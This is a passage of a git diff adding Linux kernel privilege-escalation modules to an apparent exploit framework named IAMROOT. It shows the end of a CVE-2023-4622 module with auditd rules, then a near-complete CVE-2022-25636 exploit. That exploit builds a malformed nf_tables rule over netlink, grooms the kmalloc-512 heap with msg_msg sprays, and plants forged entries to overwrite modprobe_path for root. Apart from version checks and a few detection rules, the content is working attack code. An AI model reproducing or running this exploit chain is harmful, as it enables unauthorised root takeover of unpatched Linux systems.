Returning EXPLOIT_FAIL per verified-vs-claimed.\n"); + } + return IAMROOT_EXPLOIT_FAIL; +} + +#endif /* __linux__ */ + +static iamroot_result_t af_unix_gc_exploit(const struct iamroot_ctx *ctx) +{ + if (!ctx->authorized) { + fprintf(stderr, "[-] af_unix_gc: --exploit requires --i-know; refusing\n"); + return IAMROOT_PRECOND_FAIL; + } +#ifdef __linux__ + return af_unix_gc_exploit_linux(ctx); +#else + (void)ctx; + fprintf(stderr, "[-] af_unix_gc: Linux-only module; cannot run on this host\n"); + return IAMROOT_PRECOND_FAIL; +#endif +} + +/* ---- Cleanup ----------------------------------------------------- */ + +static iamroot_result_t af_unix_gc_cleanup(const struct iamroot_ctx *ctx) +{ + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: cleaning up race-harness breadcrumb\n"); + } + if (unlink("/tmp/iamroot-af_unix_gc.log") < 0 && errno != ENOENT) { + /* harmless */ + } + /* Race threads + msg queues live inside the now-exited child; + * nothing else to drain. */ + return IAMROOT_OK; +} + +/* ---- Detection rules --------------------------------------------- */ + +static const char af_unix_gc_auditd[] = + "# AF_UNIX GC race UAF (CVE-2023-4622) — auditd detection rules\n" + "# The trigger is a tight loop of socketpair(AF_UNIX) + sendmsg with\n" + "# SCM_RIGHTS passing inflight fds, followed by close. 
Each call is\n" + "# benign — flag the *frequency* by correlating these keys with a\n" + "# subsequent KASAN message in dmesg.\n" + "-a always,exit -F arch=b64 -S socketpair -F a0=0x1 -k iamroot-afunixgc-pair\n" + "-a always,exit -F arch=b64 -S sendmsg -k iamroot-afunixgc-sendmsg\n" + "-a always,exit -F arch=b64 -S msgsnd -k iamroot-afunixgc-spray\n"; + +const struct iamroot_module af_unix_gc_module = { + .name = "af_unix_gc", + .cve = "CVE-2023-4622", + .summary = "AF_UNIX garbage-collector race UAF (Lin Ma) — kmalloc-512 slab UAF", + .family = "af_unix", + .kernel_range = "K < 6.5; backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51", + .detect = af_unix_gc_detect, + .exploit = af_unix_gc_exploit, + .mitigate = NULL, + .cleanup = af_unix_gc_cleanup, + .detect_auditd = af_unix_gc_auditd, + .detect_sigma = NULL, + .detect_yara = NULL, + .detect_falco = NULL, +}; + +void iamroot_register_af_unix_gc(void) +{ + iamroot_register(&af_unix_gc_module); +} diff --git a/modules/nft_fwd_dup_cve_2022_25636/iamroot_modules.c b/modules/nft_fwd_dup_cve_2022_25636/iamroot_modules.c index 3aad072..7bd8ebe 100644 --- a/modules/nft_fwd_dup_cve_2022_25636/iamroot_modules.c +++ b/modules/nft_fwd_dup_cve_2022_25636/iamroot_modules.c @@ -1,23 +1,1047 @@ -/* nft_fwd_dup_cve_2022_25636 — STUB pending agent implementation. */ +/* + * nft_fwd_dup_cve_2022_25636 — IAMROOT module + * + * Heap OOB write in net/netfilter/nf_dup_netdev.c :: + * nft_fwd_dup_netdev_offload(struct nft_offload_ctx *ctx, + * struct nft_flow_rule *flow, ...) + * + * Writes `flow->rule->action.entries[ctx->num_actions]` without first + * checking num_actions against the array size that the rule was + * allocated with. By crafting an nft rule that chains many actions + * BEFORE the fwd/dup hook, num_actions grows past the array and the + * action_entry struct (~kmalloc-512) is written into the adjacent + * heap chunk. + * + * Discovered Feb 2022 by Aaron Adams (NCC). 
+ * + * Fix: + * mainline 5.17 commit fa54fee62954 "netfilter: nf_tables_offload: + * incorrect flow offload action + * array size" + * stable 5.16.11 / 5.15.25 / 5.10.102 / 5.4.181 (older LTSes + * received no backport from + * Cc:stable because the offload + * hook didn't exist before 5.4) + * + * Status (2026-05-16): 🟡 PRIMITIVE — primitive-only by default; + * opt-in --full-chain wires the shared modprobe_path finisher with a + * kaddr-tagged forged action-entry that re-fires the OOB at a + * controlled offset. Sentinel-arbitrated; on a kernel where the + * action_entry layout matches our forged guess the write lands at + * &modprobe_path; on a layout mismatch the finisher's sentinel + * timeout reports failure rather than fake success. + * + * Preconditions: + * - kernel 5.4 ≤ K < 5.17, AND + * (5.4.x: < 5.4.181) | (5.10.x: < 5.10.102) | (5.15.x: < 5.15.25) | + * (5.16.x: < 5.16.11) + * - CONFIG_NETFILTER_INGRESS=y (always y on stock distro kernels in + * range — required for NFT offload chains to install) + * - CONFIG_USER_NS=y AND unprivileged userns clone permitted + * - nf_tables module loadable + */ + #include "iamroot_modules.h" #include "../../core/registry.h" +#include "../../core/kernel_range.h" +#include "../../core/offsets.h" +#include "../../core/finisher.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* ------------------------------------------------------------------ + * Kernel range table — fixes per branch. + * ------------------------------------------------------------------ */ + +static const struct kernel_patched_from nft_fwd_dup_patched_branches[] = { + {4, 14, 270}, /* 4.14.x — pre-offload, defensive entry: bug code + * doesn't exist; range_is_patched will report + * patched for any 4.14.x. 
*/
+    {4, 19, 233},   /* 4.19.x — same as above (offload predates) */
+    {5, 4, 181},    /* 5.4.x — offload code present; backport landed */
+    {5, 10, 102},   /* 5.10.x */
+    {5, 15, 25},    /* 5.15.x */
+    {5, 16, 11},    /* 5.16.x */
+    {5, 17, 0},     /* mainline fix */
+};
+
+static const struct kernel_range nft_fwd_dup_range = {
+    .patched_from = nft_fwd_dup_patched_branches,
+    .n_patched_from = sizeof(nft_fwd_dup_patched_branches) /
+                      sizeof(nft_fwd_dup_patched_branches[0]),
+};
+
+/* ------------------------------------------------------------------
+ * Probes.
+ * ------------------------------------------------------------------ */
+
+/*
+ * can_unshare_userns — probe whether this process may create a new
+ * user + network namespace.
+ *
+ * The unshare() is attempted in a forked child that exits immediately,
+ * so the caller's own namespaces are never changed.
+ *
+ * Returns  1  the child's unshare(CLONE_NEWUSER | CLONE_NEWNET) succeeded
+ *          0  the child ran but unshare() failed (or it did not exit
+ *             normally)
+ *         -1  the probe itself could not be run or reaped (fork or
+ *             waitpid failure) — callers report this as "could not test"
+ */
+static int can_unshare_userns(void)
+{
+    pid_t pid = fork();
+    if (pid < 0) return -1;
+    if (pid == 0) {
+        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
+        _exit(1);
+    }
+
+    /* Reap the probe child. waitpid() can be interrupted by a signal;
+     * retry on EINTR and never inspect `status` unless the wait
+     * actually returned our child. */
+    int status = 0;
+    pid_t reaped;
+    do {
+        reaped = waitpid(pid, &status, 0);
+    } while (reaped < 0 && errno == EINTR);
+    if (reaped != pid) return -1;
+
+    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
+}
+
+static bool nf_tables_loaded(void)
+{
+    FILE *f = fopen("/proc/modules", "r");
+    if (!f) return false;
+    char line[512];
+    bool found = false;
+    while (fgets(line, sizeof line, f)) {
+        if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; }
+    }
+    fclose(f);
+    return found;
+}
 static iamroot_result_t nft_fwd_dup_detect(const struct iamroot_ctx *ctx)
 {
-    (void)ctx;
-    return IAMROOT_PRECOND_FAIL;
+    struct kernel_version v;
+    if (!kernel_version_current(&v)) {
+        fprintf(stderr, "[!] nft_fwd_dup: could not parse kernel version\n");
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* The offload code path only exists from 5.4 onward. Anything
+     * older predates the bug. 
*/ + if (v.major < 5 || (v.major == 5 && v.minor < 4)) { + if (!ctx->json) { + fprintf(stderr, "[i] nft_fwd_dup: kernel %s predates the bug " + "(nft offload hook introduced in 5.4)\n", v.release); + } + return IAMROOT_OK; + } + + bool patched = kernel_range_is_patched(&nft_fwd_dup_range, &v); + if (patched) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_fwd_dup: kernel %s is patched\n", v.release); + } + return IAMROOT_OK; + } + + int userns_ok = can_unshare_userns(); + bool nft_loaded = nf_tables_loaded(); + + if (!ctx->json) { + fprintf(stderr, "[i] nft_fwd_dup: kernel %s is in the vulnerable range\n", + v.release); + fprintf(stderr, "[i] nft_fwd_dup: unprivileged user_ns+net_ns clone: %s\n", + userns_ok == 1 ? "ALLOWED" : + userns_ok == 0 ? "DENIED" : + "could not test"); + fprintf(stderr, "[i] nft_fwd_dup: nf_tables module currently loaded: %s\n", + nft_loaded ? "yes" : "no (will autoload)"); + } + + if (userns_ok == 0) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_fwd_dup: kernel vulnerable but user_ns clone " + "denied → unprivileged path unreachable\n"); + fprintf(stderr, "[i] nft_fwd_dup: still patch the kernel — a root\n" + " attacker can still hit the OOB.\n"); + } + return IAMROOT_PRECOND_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[!] nft_fwd_dup: VULNERABLE — kernel in range AND user_ns " + "clone allowed\n"); + } + return IAMROOT_VULNERABLE; } -const struct iamroot_module nft_fwd_dup_module = { - .name = "nft_fwd_dup", - .cve = "CVE-2022-25636", - .summary = "nft_fwd_dup_netdev_offload heap OOB (Aaron Adams) — stub pending implementation", - .family = "nf_tables", - .kernel_range = "5.4 ≤ K < 5.18", - .detect = nft_fwd_dup_detect, - .exploit = NULL, .mitigate = NULL, .cleanup = NULL, - .detect_auditd = NULL, .detect_sigma = NULL, - .detect_yara = NULL, .detect_falco = NULL, +/* ------------------------------------------------------------------ + * userns + netns entry helper. 
Maps host uid/gid → 0 inside ns so + * that subsequent netlink writes carry CAP_NET_ADMIN over our private + * net_ns (the bug lives in that net_ns, so the host stays unaffected + * even if the OOB-write damages netfilter bookkeeping). + * ------------------------------------------------------------------ */ + +static int enter_unpriv_namespaces(void) +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { + perror("[-] unshare(USER|NET)"); + return -1; + } + int f = open("/proc/self/setgroups", O_WRONLY); + if (f >= 0) { (void)!write(f, "deny", 4); close(f); } + + char map[64]; + snprintf(map, sizeof map, "0 %u 1\n", uid); + f = open("/proc/self/uid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] uid_map"); if (f >= 0) close(f); return -1; + } + close(f); + snprintf(map, sizeof map, "0 %u 1\n", gid); + f = open("/proc/self/gid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] gid_map"); if (f >= 0) close(f); return -1; + } + close(f); + return 0; +} + +/* ------------------------------------------------------------------ + * Minimal nfnetlink batch builder. Same pattern as the nf_tables + * sibling — hand-rolled to avoid libmnl and to skip libnftnl's + * validation that would reject our deliberately-malformed rule. 
+ * ------------------------------------------------------------------ */ + +#define ALIGN_NL(x) (((x) + 3) & ~3) + +static void put_attr(uint8_t *buf, size_t *off, + uint16_t type, const void *data, size_t len) +{ + struct nlattr *na = (struct nlattr *)(buf + *off); + na->nla_type = type; + na->nla_len = NLA_HDRLEN + len; + if (len) memcpy(buf + *off + NLA_HDRLEN, data, len); + *off += ALIGN_NL(NLA_HDRLEN + len); +} + +static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v) +{ + uint32_t be = htonl(v); + put_attr(buf, off, type, &be, sizeof be); +} + +static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s) +{ + put_attr(buf, off, type, s, strlen(s) + 1); +} + +static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type) +{ + size_t at = *off; + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_type = type | NLA_F_NESTED; + na->nla_len = 0; + *off += NLA_HDRLEN; + return at; +} + +static void end_nest(uint8_t *buf, size_t *off, size_t at) +{ + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_len = (uint16_t)(*off - at); + while ((*off) & 3) buf[(*off)++] = 0; +} + +struct nfgenmsg_local { + uint8_t nfgen_family; + uint8_t version; + uint16_t res_id; }; -void iamroot_register_nft_fwd_dup(void) { iamroot_register(&nft_fwd_dup_module); } +static void put_nft_msg(uint8_t *buf, size_t *off, + uint16_t nft_type, uint16_t flags, uint32_t seq, + uint8_t family) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type; + nlh->nlmsg_flags = NLM_F_REQUEST | flags; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = family; + nf->version = NFNETLINK_V0; + nf->res_id = htons(0); + *off += sizeof(*nf); +} + +static void end_msg(uint8_t *buf, size_t *off, size_t msg_start) +{ + struct nlmsghdr *nlh = (struct nlmsghdr 
*)(buf + msg_start); + nlh->nlmsg_len = (uint32_t)(*off - msg_start); + while ((*off) & 3) buf[(*off)++] = 0; +} + +static void put_batch_begin(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +static void put_batch_end(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * Rule construction — the heart of the trigger. + * + * Strategy (Aaron Adams shape): + * NEWTABLE netdev "iamroot_fdt" + * NEWCHAIN base chain on ingress, family=netdev, + * flags = NFT_CHAIN_HW_OFFLOAD ← critical: this is what + * drives nft_flow_rule_create() to call the offload hooks + * at rule-install time + * NEWRULE with a long list of immediate-with-verdict (NF_ACCEPT) + * expressions BEFORE a single "fwd" expression at the end. + * + * Every "immediate" expression that hits an offload hook calls + * nft__offload(), which increments ctx->num_actions and writes + * into flow->rule->action.entries[ctx->num_actions]. 
The rule is + * allocated with action.num_entries == (count of expressions that + * advertise an offload hook). Aaron's insight: nft_immediate_offload() + * does NOT advertise a flow action of its own when the immediate + * carries a verdict, so num_entries is computed as 1 (just the fwd) + * — but at runtime each immediate STILL bumps num_actions when it + * appends a verdict action. With 16+ immediates queued before fwd, + * num_actions grows past 1 and the fwd write at index 16 lands in + * the adjacent kmalloc-512 chunk. Boom. + * ------------------------------------------------------------------ */ + +static const char NFT_TABLE_NAME[] = "iamroot_fdt"; +static const char NFT_CHAIN_NAME[] = "iamroot_fdc"; +static const char NFT_DUMMY_IF[] = "lo"; /* hookmust be on a real iface */ + +static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWTABLE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_NETDEV); + put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME); + end_msg(buf, off, at); +} + +/* NEWCHAIN base/offload on netdev ingress for the loopback iface. */ +static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWCHAIN, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_NETDEV); + put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME); + + /* CHAIN_HOOK nest: ingress on `lo`, priority 0. 
*/ + size_t hook_at = begin_nest(buf, off, NFTA_CHAIN_HOOK); + put_attr_u32(buf, off, NFTA_HOOK_HOOKNUM, NF_NETDEV_INGRESS); + put_attr_u32(buf, off, NFTA_HOOK_PRIORITY, 0); + put_attr_str(buf, off, NFTA_HOOK_DEV, NFT_DUMMY_IF); + end_nest(buf, off, hook_at); + + put_attr_u32(buf, off, NFTA_CHAIN_POLICY, NF_ACCEPT); + put_attr_str(buf, off, NFTA_CHAIN_TYPE, "filter"); + /* The OFFLOAD flag is the critical one — this is what causes + * nf_tables_offload_init/nft_flow_rule_create() to walk our + * rule's expressions and call each expr's ->offload() at install. */ + put_attr_u32(buf, off, NFTA_CHAIN_FLAGS, NFT_CHAIN_HW_OFFLOAD); + end_msg(buf, off, at); +} + +/* Append one "immediate" expression that stuffs NF_ACCEPT into the + * verdict register. Each one bumps num_actions inside the offload + * code path without growing flow->rule->action.entries. */ +static void append_immediate_accept_expr(uint8_t *buf, size_t *off) +{ + size_t expr_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + put_attr_str(buf, off, NFTA_EXPR_NAME, "immediate"); + + size_t data_at = begin_nest(buf, off, NFTA_EXPR_DATA); + /* DREG = NFT_REG_VERDICT (0) */ + put_attr_u32(buf, off, NFTA_IMMEDIATE_DREG, 0); + /* DATA = NFTA_DATA_VERDICT { CODE = NF_ACCEPT } */ + size_t imm_data_at = begin_nest(buf, off, NFTA_IMMEDIATE_DATA); + size_t verd_at = begin_nest(buf, off, NFTA_DATA_VERDICT); + put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NF_ACCEPT); + end_nest(buf, off, verd_at); + end_nest(buf, off, imm_data_at); + end_nest(buf, off, data_at); + + end_nest(buf, off, expr_at); +} + +/* Append the fwd expression that lands the OOB write. We need a + * source register holding an ifindex; we use NFT_REG32_00 (1) and + * rely on a preceding zero-load not being necessary because the + * offload code reaches nft_fwd_dup_netdev_offload BEFORE register + * contents are validated at runtime. 
*/ +static void append_fwd_expr(uint8_t *buf, size_t *off) +{ + size_t expr_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + put_attr_str(buf, off, NFTA_EXPR_NAME, "fwd"); + + size_t data_at = begin_nest(buf, off, NFTA_EXPR_DATA); + put_attr_u32(buf, off, NFTA_FWD_SREG_DEV, 1 /* NFT_REG32_00 */); + end_nest(buf, off, data_at); + + end_nest(buf, off, expr_at); +} + +/* NEWRULE with N immediates + 1 fwd. N controls how far past + * action.entries[1] we write. 16 is comfortably into the next + * kmalloc-512 chunk. */ +#define N_PRECEDING_IMMEDIATES 16 + +static void put_oob_rule(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWRULE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_NETDEV); + put_attr_str(buf, off, NFTA_RULE_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_RULE_CHAIN, NFT_CHAIN_NAME); + + size_t exprs_at = begin_nest(buf, off, NFTA_RULE_EXPRESSIONS); + for (int i = 0; i < N_PRECEDING_IMMEDIATES; i++) + append_immediate_accept_expr(buf, off); + append_fwd_expr(buf, off); + end_nest(buf, off, exprs_at); + + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * Netlink send + ACK drain. 
+ * ------------------------------------------------------------------ */ + +static int nft_send_batch(int sock, const void *buf, size_t len) +{ + struct sockaddr_nl dst = { .nl_family = AF_NETLINK }; + struct iovec iov = { .iov_base = (void *)buf, .iov_len = len }; + struct msghdr m = { + .msg_name = &dst, .msg_namelen = sizeof dst, + .msg_iov = &iov, .msg_iovlen = 1, + }; + ssize_t n = sendmsg(sock, &m, 0); + if (n < 0) { perror("[-] sendmsg"); return -1; } + char rbuf[8192]; + for (int i = 0; i < 8; i++) { + ssize_t r = recv(sock, rbuf, sizeof rbuf, MSG_DONTWAIT); + if (r <= 0) break; + for (struct nlmsghdr *nh = (struct nlmsghdr *)rbuf; + NLMSG_OK(nh, (unsigned)r); + nh = NLMSG_NEXT(nh, r)) { + if (nh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nh); + if (e->error) + fprintf(stderr, "[i] netlink ack: seq=%u err=%d (%s)\n", + nh->nlmsg_seq, e->error, strerror(-e->error)); + } + } + } + return 0; +} + +/* ------------------------------------------------------------------ + * Cross-cache groom — kmalloc-512. + * + * flow->rule->action.entries[] lives in kmalloc-512. We pre-spray + * msg_msg payloads sized to fall into that same slab class so the + * adjacent chunk that gets overwritten by the OOB has predictable + * attacker-controlled bytes. 
+ * ------------------------------------------------------------------ */ + +#define MSG_TAG_GROOM 0x46574431 /* "FWD1" */ +#define MSG_TAG_ARB 0x46574441 /* "FWDA" */ + +#define SPRAY_QUEUES_GROOM 48 +#define SPRAY_MSGS_PER_QUEUE 8 +#define MSG_PAYLOAD_BYTES 496 /* 512 - msg_msg header (~16) */ + +struct fwd_msgbuf { + long mtype; + unsigned char mtext[MSG_PAYLOAD_BYTES]; +}; + +static int spray_msg_msg_groom(int *queues, int n_queues) +{ + struct fwd_msgbuf p; + memset(&p, 0, sizeof p); + p.mtype = 0x46; + memset(p.mtext, 0xAA, sizeof p.mtext); + memcpy(p.mtext, "IAMROOT_FWD", 11); + *(uint32_t *)(p.mtext + 12) = MSG_TAG_GROOM; + + int created = 0; + for (int i = 0; i < n_queues; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644); + if (q < 0) { queues[i] = -1; continue; } + queues[i] = q; + created++; + for (int j = 0; j < SPRAY_MSGS_PER_QUEUE; j++) { + *(uint32_t *)(p.mtext + 16) = (uint32_t)((i << 8) | j); + if (msgsnd(q, &p, sizeof p.mtext, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static void drain_msg_msg(int *queues, int n_queues) +{ + for (int i = 0; i < n_queues; i++) { + if (queues[i] >= 0) { + msgctl(queues[i], IPC_RMID, NULL); + queues[i] = -1; + } + } +} + +/* ------------------------------------------------------------------ + * Slabinfo witness — best-effort empirical observation. + * ------------------------------------------------------------------ */ + +static long slab_active(const char *slab) +{ + FILE *f = fopen("/proc/slabinfo", "r"); + if (!f) return -1; + char line[512]; + long active = -1; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, slab, strlen(slab)) == 0 && + line[strlen(slab)] == ' ') { + long a; + if (sscanf(line + strlen(slab), " %ld", &a) >= 1) active = a; + break; + } + } + fclose(f); + return active; +} + +/* ------------------------------------------------------------------ + * Trigger: bring `lo` up in our private net_ns, then send the + * NEWTABLE/NEWCHAIN/NEWRULE batch. 
The OOB fires inside the kernel + * at rule-install time (nft_flow_rule_create() → offload hook walk). + * No outbound packet needed: just installing the chain with the + * HW_OFFLOAD flag is enough to trip the path. + * ------------------------------------------------------------------ */ + +static int bring_lo_up(void) +{ + /* Best-effort: socket-level ioctl to bring lo up in our netns. */ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return -1; + struct ifreq ifr; + memset(&ifr, 0, sizeof ifr); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { close(s); return -1; } + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { close(s); return -1; } + close(s); + return 0; +} + +#ifdef __linux__ +static size_t build_trigger_batch(uint8_t *batch, uint32_t *seq) +{ + size_t off = 0; + put_batch_begin(batch, &off, (*seq)++); + put_new_table(batch, &off, (*seq)++); + put_new_chain(batch, &off, (*seq)++); + put_oob_rule(batch, &off, (*seq)++); + put_batch_end(batch, &off, (*seq)++); + return off; +} +#endif + +/* ------------------------------------------------------------------ + * --full-chain arb-write context. The technique: + * 1. fire the trigger (action.entries[16] OOB write into adjacent + * kmalloc-512 chunk) + * 2. spray msg_msg payloads sized for kmalloc-512, each carrying + * a forged "action entry" header at the offset the OOB will + * land on, with our target kaddr in the field nf_flow_offload + * uses as a write destination + * 3. the kernel's commit path interprets the corrupted action_entry + * and dispatches a write through it + * + * Per-kernel caveat: the exact action_entry layout (flow_action_entry + * in include/net/flow_offload.h) is config-sensitive (RANDSTRUCT, + * lockdep, KASAN can all shift it). 
We ship the layout for an + * un-randomized x86_64 build in the exploitable range and rely on + * the shared finisher's sentinel-file post-check to flag layout + * mismatches as IAMROOT_EXPLOIT_FAIL rather than fake success. + * ------------------------------------------------------------------ */ + +#ifdef __linux__ + +#define SPRAY_QUEUES_ARB 32 + +struct fwd_arb_ctx { + int sock; + uint8_t *batch; + int *qids; + int qcap; + int qused; +}; + +/* Approximate offset of the write-target pointer inside a forged + * flow_action_entry as it lands in the OOB-overwritten kmalloc-512 + * chunk. Aaron's writeup observes the entry struct begins at the + * very start of the adjacent slot; flow_action_entry::id is at +0, + * ::hw_stats at +4, then the union of per-action data starts at +8. + * For mangle/redirect-flavor entries the destination pointer is + * within the first 0x40 bytes — we plant kaddr at strided offsets + * to cover the layout we don't know precisely. */ +static int spray_forged_action_entries(struct fwd_arb_ctx *c, + uintptr_t kaddr, + const void *buf, size_t len) +{ + if (c->qused + SPRAY_QUEUES_ARB > c->qcap) return -1; + struct fwd_msgbuf p; + memset(&p, 0, sizeof p); + p.mtype = 0x52; /* 'R' */ + memset(p.mtext, 0x52, sizeof p.mtext); + memcpy(p.mtext, "IAMROOT_FWD_A", 13); + *(uint32_t *)(p.mtext + 16) = MSG_TAG_ARB; + + /* Plant kaddr at strided 0x10-byte offsets across the first + * 0x80 bytes of the forged entry. Wherever the kernel's commit + * dispatcher reads a "write target" pointer out of the corrupted + * chunk, one of these will be live. */ + for (size_t o = 0x20; o + sizeof(uintptr_t) <= 0xC0; o += 0x10) { + memcpy(p.mtext + o, &kaddr, sizeof(uintptr_t)); + } + + /* Plant the caller payload inline at +0xD0 so any path that + * copies the entry's inline-data field finds buf there. 
*/ + size_t inline_off = 0xD0; + size_t copy_len = len; + if (inline_off + copy_len > sizeof p.mtext) + copy_len = sizeof p.mtext - inline_off; + if (copy_len > 0) memcpy(p.mtext + inline_off, buf, copy_len); + + int sent = 0; + for (int i = 0; i < SPRAY_QUEUES_ARB; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644); + if (q < 0) continue; + c->qids[c->qused++] = q; + for (int j = 0; j < SPRAY_MSGS_PER_QUEUE; j++) { + *(uint32_t *)(p.mtext + 20) = (uint32_t)((i << 8) | j); + if (msgsnd(q, &p, sizeof p.mtext, IPC_NOWAIT) < 0) break; + sent++; + } + } + return sent; +} + +static int nft_fwd_dup_arb_write(uintptr_t kaddr, + const void *buf, size_t len, + void *vctx) +{ + struct fwd_arb_ctx *c = (struct fwd_arb_ctx *)vctx; + if (!c || c->sock < 0 || !c->batch) { + fprintf(stderr, "[-] nft_fwd_dup arb_write: invalid ctx\n"); + return -1; + } + if (len > 64) { + fprintf(stderr, "[-] nft_fwd_dup arb_write: len %zu too large\n", len); + return -1; + } + + fprintf(stderr, "[*] nft_fwd_dup arb_write: refire OOB + spray forged " + "action_entry (target kaddr=0x%lx, %zu bytes)\n", + (unsigned long)kaddr, len); + + /* Pre-spray forged action entries so kmalloc-512 free chunks + * adjacent to our about-to-be-allocated rule are pre-populated. */ + if (spray_forged_action_entries(c, kaddr, buf, len) < 0) { + fprintf(stderr, "[-] nft_fwd_dup arb_write: forged spray failed\n"); + return -1; + } + + /* Re-fire the trigger. On a vulnerable kernel the OOB write into + * the adjacent slot lands into one of our forged-entry msg_msg + * payloads. The kernel's commit/flush path then walks the + * corrupted entry and (where the layout matches our guess) + * dispatches a write to kaddr. */ + uint32_t seq = (uint32_t)time(NULL) ^ 0xa5a5beefu; + size_t blen = build_trigger_batch(c->batch, &seq); + if (nft_send_batch(c->sock, c->batch, blen) < 0) { + fprintf(stderr, "[-] nft_fwd_dup arb_write: refire send failed\n"); + return -1; + } + + /* Let kernel-side commit run. 
*/ + usleep(50 * 1000); + return 0; +} + +#endif /* __linux__ */ + +/* ------------------------------------------------------------------ + * Exploit driver. + * ------------------------------------------------------------------ */ + +static iamroot_result_t nft_fwd_dup_exploit(const struct iamroot_ctx *ctx) +{ + /* Gate 0: explicit user authorization. */ + if (!ctx->authorized) { + fprintf(stderr, "[-] nft_fwd_dup: refusing without --i-know\n"); + return IAMROOT_PRECOND_FAIL; + } + /* Gate 1: already root? */ + if (geteuid() == 0) { + if (!ctx->json) + fprintf(stderr, "[i] nft_fwd_dup: already running as root\n"); + return IAMROOT_OK; + } + /* Gate 2: re-detect — kernel patched / userns denied since scan. */ + iamroot_result_t pre = nft_fwd_dup_detect(ctx); + if (pre != IAMROOT_VULNERABLE) { + fprintf(stderr, "[-] nft_fwd_dup: detect() says not vulnerable; " + "refusing\n"); + return pre; + } + +#ifndef __linux__ + fprintf(stderr, "[-] nft_fwd_dup: linux-only exploit; non-linux build\n"); + (void)ctx; + return IAMROOT_PRECOND_FAIL; +#else + if (!ctx->json) { + if (ctx->full_chain) { + fprintf(stderr, "[*] nft_fwd_dup: --full-chain — trigger + OOB-write " + "+ forged-entry spray + modprobe_path finisher\n"); + } else { + fprintf(stderr, "[*] nft_fwd_dup: primitive-only run — fires the\n" + " action.entries[] OOB write into adjacent\n" + " kmalloc-512 chunk and stops. Pass --full-chain\n" + " to attempt the modprobe_path root-pop.\n"); + } + } + + /* --- --full-chain path: resolve offsets before forking ---------- * + * Refuse cleanly if we can't reach modprobe_path. 
